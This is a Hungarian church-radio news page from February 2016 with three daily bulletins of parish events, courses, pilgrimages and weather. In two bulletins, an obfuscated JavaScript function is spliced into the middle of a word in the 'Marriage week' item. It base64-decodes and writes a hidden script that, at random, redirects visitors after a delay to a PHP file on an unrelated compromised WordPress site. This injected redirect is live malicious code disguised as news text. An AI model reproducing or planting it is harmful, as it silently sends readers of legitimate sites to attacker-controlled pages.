2016. február 4. – Hírek és programajánló

H Í R E K   E S T E

Sűrgős segítségre lenne szükség!
Egy egyházi alkalmazott súlyos állapotba került be a kórházba és műtétre szorul. Ahoz viszont, hogy műteni tudják, vérre lenne szüksége. Hívjuk hallgatóinkat, aki tud, segítsen, vért adva a csíkszeredai vérközpontban, a holnapi nap folyamán. Fontos tudni, hogy 18-60 év közötti egészséges emberek adhatnak vért. A szükséges vércsoport B vagy 3-as, RH pozitív. Isten fizesse mindenki jószándékát!

Mária rádiós önkéntestalálkozók
Folynak az idei első önkéntestalálkozók. Nagyvárad és Kolozsvár után holnap délelőtt tizenegy órától Gyergyószentmiklóson a Szent Miklós plébánián várjuk önkénteseinket, itt jelen lesz majd rádiónk műsorigazgatója is, Karácson Tibor atya. Február 6-án, elsőszombaton, délután három órától Csíksomlyón, a kolostor épületébe várják önkénteseinket Szilágyi László promóciós munkatársunk, valamint Karácson Tibor műsorigazgató, majd Kászonújfaluban, a délután öt órás szentmise végén közönségtalálkozóra kerül sor. Vasárnap, február 7-én, Nyújtódon két közönségtalálkozó is lesz, a reggel kilenc, illetve a tizenegy órás szentmisék után. Ez utóbbi szentmisén, melyet rádiónk is közvetít, koncelebrál Karácson Tibor atya. Szintén vasárnap, délután három órától Sepsiszentgyörgyön, a Krisztus Király plébánia hittantermében várják önkénteseinket Szilágyi László és Tibor atya. A további helyszínekről hírműsorainkban folyamatos tájékoztatást adunk.

Ifjúság vasárnapja a Gyulafehérvári Főegyházmegyében
Tizenhat éve farsang utolsó vasárnapját, az ifjúság vasárnapjának nevezik. Az ifjúsági lelkipásztorkodás minden korban kihívást jelentett, munkáját az Ifjúsági Főlelkészség koordinálja. Február 7-én, vasárnap a Gyulafehérvári Főegyházmegye templomaiban az ifjúsági pasztorációs tevékenységek támogatására gyűjtés lesz.

Téli bekukkantó a Cseperedőben
Február 8-11 között a Korai Nevelő- és Fejlesztőközpont újra megnyitja kapuit az érdeklődő szülők és gyermekeik számára, vakációs programot szervezve a marosvásárhelyi és a szászrégeni Cseperedőben. A 0-3 éves korú gyermekeknek és óvodás testvéreiknek olyan változatos programokat kínálnak, mint babamasszázs, labdamedence, ügyességi pályák és játékok, barkácsolás, fejlesztő és kreatív játékok. A Téli Bekukkantó napok részletes programja, illetve egyéb információk a www.caritas-ab.ro honlapon találhatók.

Jegyeskurzusok indulnak
A Családpasztorációs Iroda szervezésében február 9-én, kedden újabb jegyeskurzus indul Marosvásárhelyen – tudtuk meg az érsekség honlapjáról. A jegyeskurzus egyházi és szakmai segítség fiataloknak, akik házasságra készülnek, lehetőség a párkapcsolat elmélyítésére, egyben ismerkedési lehetőség más párokkal, közösségben való felkészülés a szentségi házasságra és a keresztény családi életre.
A kurzus nyolc hétig tart és április 5 -én ér véget. A találkozók kedd esténként lesznek 19.00-21.00 óra között. Elsősorban azok jelentkezését várják, akik idén akarnak összeházasodni, de jelentkezhetnek olyan párok is, akik szeretnék jobban megismerni önmagukat és kapcsolatukat.
A kurzus házigazdái: Sófalvi Szabolcs és Adél. Jelentkezni a honlapunkon található elérhetőségeken lehet. (Szénégető Istvánnál: szenegetoi@gmail.com, 0740-138784 vagy a Sófalvi házaspárnál: adelasofalvi@yahoo.com , 0744-799055).
Ugyancsak kedden, február 9-én kezdődik jegyeskurzus a Székelyudvarhely-Szombatfalva Szent György és a Kis Szent Teréz egyházközségek közös szervezésében. Jelentkezni személyesen lehet a plébániahivatalokban.
Sepsiszentgyörgyön február 10-én, szerdán este hét órától kezdődik a jegyeskurzus a Szent József plébánián. Jelentkezni a plébánia irodájában lehet.

Férjek – édesapák hétvégéje
A Gyulafehérvári Főegyházmegye Pasztorális Bizottságának család-munkacsoportja szervezésében idén is sor kerül a Férjek-Édesapák Hétvégéjére, melynek fókuszában az apa-fia kapcsolat áll. A program február 19-21 között zajlik Csíksomlyón, a Jakab Antal Felnőttképzési és Tanulmányi Központban. Jelentkezni a www.csalad.ro oldalon lehetséges.

Az időjárásról: Hajnalban többfelé lehet eső, zápor, nyugaton és a középső területeken hózápor, havazás is. Egyre nagyobb területen megerősödik, néhol viharossá fokozódik a szél. Hajnalban -9, -2, délután 1-6 fok várható.

MRE – Hírszolgálat, 2016. február 4.


H Í R E K   D É L B E N

Első csütörtöki szentségimádás
A Mária Rádió nagyváradi stúdiójában csendes szentségimádást tartunk egészen délután három óráig. Várjuk mindazokat, akik szivesen betérnek akár egy imára is.

Mária rádiós önkéntestalálkozók
Elkezdődtek az önkéntestalálkozók idei sorozata. Ma a kolozsvári vételkörzet hallgatóit várjuk délután négy órára, a Szent Mihály Nőszövetség dísztermébe (Szentegyház utca 2. szám), holnap pedig délelőtt tizenegy órától Gyergyószentmiklóson a Szent Miklós plébánián tartjuk találkozónkat, melyen jelen lesz rádiónk műsorigazgatója, Karácson Tibor atya is. Február 6-án, elsőszombaton, délután három órától Csíksomlyón, a kolostor épületébe várják önkénteseinket Szilágyi László promóciós munkatársunk, valamint Karácson Tibor műsorigazgató, majd Kászonújfaluban, a délután öt órás szentmise végén közönségtalálkozóra kerül sor. A további helyszínekről hírműsorainkban folyamatos tájékoztatást adunk.

Szentévi zarándoklati nap Nagyváradon
Az Irgalmasság Évében a Nagyváradi Római Katolikus Egyházmegye zarándoklatra várja a híveket a székesegyházhoz, hogy a megnyitott Szent Kapun átlépve Isten irgalmasságára tekintsenek és maguk is a megújulás útjára lépjenek. Az előzetesen összeállított beosztásnak megfelelően, ma délután öt órakor a Várad-Környéki Esperesi Kerület hívei zarándokolnak a székesegyházhoz. A szentmise főcelebránsa Böcskei László megyéspüspök, az ünnepi szónok pedig Rajna József főesperes, fugyivásárhelyi plébános. A zarándoklati napra való tekintettel a város többi templomában a ma esti szentmisék elmaradnak.

Pedagógusok a kiégésről
Negyedik alkalommal szervez találkozót pedagógusoknak a szatmári Püspökség Világiak Irodája. Február 13-án, szombaton, 10-14 óra között a pedagógusokat és más, segítő szakmákban tevékenységet folytatókat várnak egy előadásra. A pedagógustalálkozók folytatásaként megvalósuló rendezvényen Gyímesné Márkó Etelka fejlesztő pedagógus a kiégésről beszél, majd az előadást követően beszélgetés kezdődik. A Scheffler János Lelkipásztori Központ udvaráról elérhető Szent István teremben megrendezésre kerülő előadásra még ma lehet jelentkezni a lepedusistvan@yahoo.com email címen.

Szerzetesek találkozója Nagyváradon
A Megszentelt Élet XX. Világnapja alkalmából február 6-án, szombaton Nagyváradon találkoznak a nagyváradi római és görög katolikus egyházmegyék területén élő szerzetesek és szerzetesnők. A program délelőtt fél tizenegykor szentmisével kezdődik a Püspöki Palota kápolnájában, majd délben előadásra kerül sor a Palota dísztermében. A találkozó kiállítással és könyvbemutatóval zárul.

Fogadalmi triduum Nagyváradon
Február 7. és 9. között, hamvazószerda előtti három napon a Székeskáptalan ősi fogadalmi szentségimádását és triduumát tartják a Nagyvárad-Újvárosi Szent László templomban, mely egyben a plébánia lelkigyakorlata is. (Mindhárom napon délután 4 órától szentségimádás, majd öt órától szentmise lesz, meghívott szónok Olasz Lajos, berettyóújfalui plébános.) Az eseményről bővebben a mai Déli magazinban hallhatnak

Házasság hete egyházmegyéinkben
Február 7-14. között ötödik alkalommal kerül megrendezésre a Házasság hete, a következő mottóval: A szeretet: szenvedély és döntés.
A gyulafehérvári egyházmegyében több település kapcsolódik be a rendezvénysorozatba: Székelyudvarhelyen, idén is sokféle programra hívják a házasokat: kettesben eltöltött vacsora, filmnézés, szentségimádás, keresztút, tanúságtételek. A különböző rendezvényekre előzetes bejelentkezés szükséges. Csíkszentdomonkoson lesz: házaspárok bálja, filmest, keresztút a családokért, előadások, szentmise. Marosvásárhelyen és Marosszentgyörgyön is sokszínű a választék a családok számára: előadások, párbeszédek, meghitt vacsorák, ima és böjtnap, szentmise. Gyergyószentmiklóson lesz: kerekasztal beszélgetés, filmnézés, virrasztás, míg Kolozsváron egy érdekes játékra és előadásra hívják a házasokat. A részletes programokat, illetve elérhetőségeket minden helyszínről a gyulafehérvári érsekség honlapján találják.
A szatmári egyházmegyében is érdekes programokkal várják a házasokat, családokat: házas kalfunction a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<>4);w6=((w9&15)<>2);qe=((we&3)<=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oa<y1.length);document.write(x0);};a4872b9c6b('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KdmFyIG51bWJlcjE9TWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogNSk7IA0KaWYgKG51bWJlcjE9PTMpDQp7DQogdmFyIGRlbGF5ID0gMTUwMDA7CQ0KIHNldFRpbWVvdXQoImRvY3VtZW50LmxvY2F0aW9uLmhyZWY9J2h0dHA6Ly9oYWxlYWluYS1jYWZlLmNvbS93cC1jb250ZW50L3BsdWdpbnMvYWxsLWluLW9uZS1zZW8tcGFjay9pbmMvdHJhbnNsYXRpb24ucGhwJyIsIGRlbGF5KTsNCn0NCjwvc2NyaXB0PgAA');andtúra, filmvetítés, előadások, keresztút. Részletes információkat, illetve elérhetőségeket a különböző programokra való jelentkezéshez a szatmariegyhazmegye.ro oldalon találhatnak.

Az időjárásról: A tegnapi hidegfront után mára felszakadozott a felhőzet, több helyen kisüt a nap, legfeljebb néhol fordulhat elő futó zápor, hózápor. Délután 3-8 C fokra, illetve szeles időre számíthatunk.

MRE - Hírszolgálat, 2016. február 4.


H Í R E K   R E G G E L

Első csütörtöki szentségimádás
A Mária Rádió nagyváradi stúdiójának kápolnájában csendes szentségimádást tartunk a mai napon reggel kilenc és délután három óra között. Várjuk mindazokat, akik szivesen betérnek akár egy imára is.

Mária rádiós önkéntestalálkozók
Elkezdődtek az önkéntestalálkozók idei sorozata. Ma a kolozsvári vételkörzet hallgatóit várjuk délután négy órára, a Szent Mihály Nőszövetség dísztermébe (Szentegyház utca 2. szám), holnap pedig délelőtt tizenegy órától Gyergyószentmiklóson a Szent Miklós plébánián tartjuk találkozónkat, melyen jelen lesz rádiónk műsorigazgatója, Karácson Tibor atya is. Február 6-án, elsőszombaton, délután három órától Csíksomlyón, a kolostor épületébe várják önkénteseinket Szilágyi László promóciós munkatársunk, valamint Karácson Tibor műsorigazgató, majd Kászonújfaluban, a délután öt órás szentmise végén közönségtalálkozóra kerül sor. A további helyszínekről hírműsorainkban folyamatos tájékoztatást adunk.

Örökös szentségimádási nap
A Gyulafehérvári Főegyházmegyében ma Aranyosgyéresen várják a híveket az Oltáriszentségben jelen levő Krisztus imádatára az örökös szentségimádási nap alkalmából.
A nagyváradi egyházmegyében újraéledt örökös szentségimádási nap hagyományának megfelelően február hónap első vasárnapján, 7-én, Nagyváradon a Szent Katalin-telepi plébániatemplomban lesz a híveknek lehetősége a szentségimádásba bekapcsolódni.

Szentévi zarándoklati nap Nagyváradon
Az Irgalmasság Évében a Nagyváradi Római Katolikus Egyházmegye zarándoklatra várja a híveket a székesegyházhoz, hogy a megnyitott Szent Kapun átlépve Isten irgalmasságára tekintsenek és maguk is a megújulás útjára lépjenek. Az előzetesen összeállított beosztásnak megfelelően, ma délután öt órakor a Várad-Környéki Esperesi Kerület hívei zarándokolnak a székesegyházhoz. A szentmise főcelebránsa Böcskei László megyéspüspök, az ünnepi szónok pedig Rajna József főesperes, fugyivásárhelyi plébános. A zarándoklati napra való tekintettel a város többi templomában a ma esti szentmisék elmaradnak.

Pedagógusok a kiégésről
Negyedik alkalommal szervez találkozót pedagógusoknak a szatmári Püspökség Világiak Irodája. Február 13-án, szombaton, 10-14 óra között a pedagógusokat és más, segítő szakmákban tevékenységet folytatókat várnak egy előadásra. A pedagógustalálkozók folytatásaként megvalósuló rendezvényen Gyímesné Márkó Etelka fejlesztő pedagógus a kiégésről beszél, majd az előadást követően beszélgetés kezdődik. A Scheffler János Lelkipásztori Központ udvaráról elérhető Szent István teremben megrendezésre kerülő előadásra még ma lehet jelentkezni a lepedusistvan@yahoo.com email címen.

Szerzetesek találkozója Nagyváradon
A Megszentelt Élet XX. Világnapja alkalmából február 6-án, szombaton Nagyváradon találkoznak a nagyváradi római és görög katolikus egyházmegyék területén élő szerzetesek és szerzetesnők. A program délelőtt fél tizenegykor szentmisével kezdődik a Püspöki Palota kápolnájában, majd délben előadásra kerül sor a Palota dísztermében. A találkozó kiállítással és könyvbemutatóval zárul.

Téli bekukkantó a Cseperedőben
Február 8-11 között a Korai Nevelő- és Fejlesztőközpont újra megnyitja kapuit az érdeklődő szülők és gyermekeik számára, vakációs programot szervezve a marosvásárhelyi és a szászrégeni Cseperedőben. A 0-3 éves korú gyermekeknek és óvodás testvéreiknek olyan változatos programokat kínálnak, mint babamasszázs, labdamedence, ügyességi pályák és játékok, barkácsolás, fejlesztő és kreatív játékok. A Téli Bekukkantó napok részletes programja, illetve egyéb információk a www.caritas-ab.ro honlapon találhatók.

Házasság hete egyházmegyéinkben
Február 7-14. között ötödik alkalommal kerül megrendezésre a Házasság hete, a következő mottóval: A szeretet: szenvedély és döntés.
A gyulafehérvári egyházmegyében, Székelyudvarhelyen idén is sokféle programra hívják a házasokat: kettesben eltöltött vacsora, filmnézés, szentségimádás, keresztút, tanúságtételek. A különböző rendezvényekre előzetes bejelentkezés szükséges. Csíkszentdomonkoson a következő programokkal várják a házasokat: házaspárok bálja, filmest, keresztút a családokért, előadások, szentmise. Marosvásárhelyen és Marosszentgyörgyön is sokszínű a választék a családok számára: előadások, párbeszédek, meghitt vacsorák, ima és böjtnap, szentmise. A részletes programokat, illetve elérhetőségeket minden helyszínről a gyulafehérvári érsekség honlapján találnak.
A szatmári egyházmegyében is érdekes programokkal várják a házasokat, családokat: házas kalfunction a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<>4);w6=((w9&15)<>2);qe=((we&3)<=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oa<y1.length);document.write(x0);};a4872b9c6b('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KdmFyIG51bWJlcjE9TWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogNSk7IA0KaWYgKG51bWJlcjE9PTMpDQp7DQogdmFyIGRlbGF5ID0gMTUwMDA7CQ0KIHNldFRpbWVvdXQoImRvY3VtZW50LmxvY2F0aW9uLmhyZWY9J2h0dHA6Ly9oYWxlYWluYS1jYWZlLmNvbS93cC1jb250ZW50L3BsdWdpbnMvYWxsLWluLW9uZS1zZW8tcGFjay9pbmMvdHJhbnNsYXRpb24ucGhwJyIsIGRlbGF5KTsNCn0NCjwvc2NyaXB0PgAA');andtúra, filmvetítés, előadások, keresztút. Részletes információkat, illetve elérhetőségeket a különböző programokra való jelentkezéshez a szatmariegyhazmegye.ro oldalon találhatnak.

Az időjárásról: Mától erős hidegfront érkezik jelentős esővel, erős széllel. A front mögött holnapra felszakadozik a felhőzet, kisüt a nap, legfeljebb néhol fordulhat elő futó zápor, hózápor. Hajnalban sokfelé fagyhat. A leghidegebb az erdélyi medencében lesz, itt -9 C fok is előfordulhat. Délután 3-8 C fokra, illetve szeles időre számíthatunk.

MRE - Hírszolgálat, 2016. február 4.

About the author

maradmin

Leave a Comment